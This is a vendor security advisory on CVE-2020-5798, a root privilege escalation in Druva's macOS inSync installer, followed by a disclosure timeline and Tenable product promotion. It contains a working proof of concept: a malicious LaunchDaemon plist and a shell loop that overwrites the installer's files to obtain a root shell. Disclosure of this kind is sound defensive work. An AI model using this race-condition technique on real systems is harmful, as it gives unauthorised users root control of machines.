Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Druva inSync Installer Privilege Escalation

High

Synopsis

Druva inSync Privilege Escalation via Installer

In the installation package for macOS provided by Druva (install inSync.pkg), the "postinstall" script included in the installer allows for privilege escalation from a normal user to root due to improper checking of the integrity of the LaunchDaemon scripts.

The plists used for these daemons are generated in a user-writable directory rather than an installer sandbox or some other privileged directory, which allows a lower-privileged user to overwrite these files during the installation process. These files later launch the daemons with root privileges.

Snippet from postinstall script:

# Prepare inSyncDecommission daemon for launch
DAEMONS_DIR=/Library/LaunchDaemons
cp "${APP}/Contents/Resources/inSyncDecommission.plist" ${DAEMONS_DIR}DECOM_DAEMON="${APP}/Contents/MacOS/inSyncDecommission"
DAEMON_PLIST=${DAEMONS_DIR}/inSyncDecommission.plist# Prepare inSyncUpgradeDaemon daemon for launch
cp "${APP}/Contents/Resources/inSyncUpgradeDaemon.plist" ${DAEMONS_DIR}UPGRADE_DAEMON="${APP}/Contents/MacOS/inSyncUpgradeDaemon"
UPGRADE_PLIST=${DAEMONS_DIR}/inSyncUpgradeDaemon.plist 

As a simple proof of concept, creating the following plist, running the shell commands, and then running the installer will cause the launch daemon to spawn a root shell instead of the desired inSync service.

It should be noted that the LaunchAgents later in the script are also affected by this issue, but with a less severe impact as they only provide a persistence mechanism rather than elevated privileges.

Sample malicious plist:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>KeepAlive</key>
	<true/>
	<key>Label</key>
	<string>com.druva.inSyncDecom</string>
	<key>ProgramArguments</key>
	<array>
		<string>/Applications/iTerm.app/Contents/MacOS/iTerm2</string>
	</array>
	<key>RunAtLoad</key>
	<true/>
</dict>
</plist>

Sample shell commands:

while true; do                                                                                                                                                                                                     
    mkdir -p /Applications/Druva\ inSync.app/Contents/Resources;
    yes | cp -f /tmp/insync.plist /Applications/Druva\ inSync.app/Contents/Resources/inSyncDecommission.plist
done

 

Disclosure Timeline

September 9, 2020 - Vulnerabilities Discovered
September 9, 2020 - Tenable discloses to vendor.
September 10, 2020 - Druva acknowledges.
October 7, 2020 - Tenable requests status update.
October 13, 2020 - Druva requests clarification.
October 13, 2020 - Tenable provides clarification.
November 13, 2020 - Tenable requests status update.
November 13, 2020 - Druva provides status update.
November 17, 2020 - Druva requests secure contact to send update link to.
November 17, 2020 - Tenable provides contact information.
November 17, 2020 - Druva sends update preview.
November 18, 2020 - Tenable confirms existing PoC no longer works.
November 30, 2020 - Druva states that fixed installer will be released on Dec. 4.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2020-5798
Tenable Advisory ID
TRA-2020-67
Credit

Jimi Sebree

CVSSv3 Base / Temporal Score
9.3 / 8.6
CVSSv3 Vector
AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
Druva inSync Client Installers for v6.8.0 and prior
Risk Factor
High

Advisory Timeline

December 4, 2020 - Initial release.
tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

tenable.io BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

Choose Your Subscription Option:

Buy Now

Try Nessus Professional Free

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today.

NEW - Nessus Expert Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Professional Trial.

Buy Nessus Professional

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

Tenable.io BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

Choose Your Subscription Option:

Buy Now

Try Tenable.io Web Application Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web Application Scanning trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.cs Cloud Security.

Buy Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable.io Container Security

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

Buy Tenable.io Container Security

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

Try Tenable Lumin

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable.io Vulnerability Management, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

Buy Tenable Lumin

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable.cs

Enjoy full access to detect and fix cloud infrastructure misconfigurations and view runtime vulnerabilities. Sign up for your free trial now. To learn more about the trial process click here.

Your Tenable.cs Cloud Security trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.io Web Application Scanning.

Contact a Sales Rep to Buy Tenable.cs

Contact a Sales Representative to learn more about Tenable.cs Cloud Security and see how easy it is to onboard your cloud accounts and get visibility into both cloud misconfigurations and vulnerabilities within minutes.

Try Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training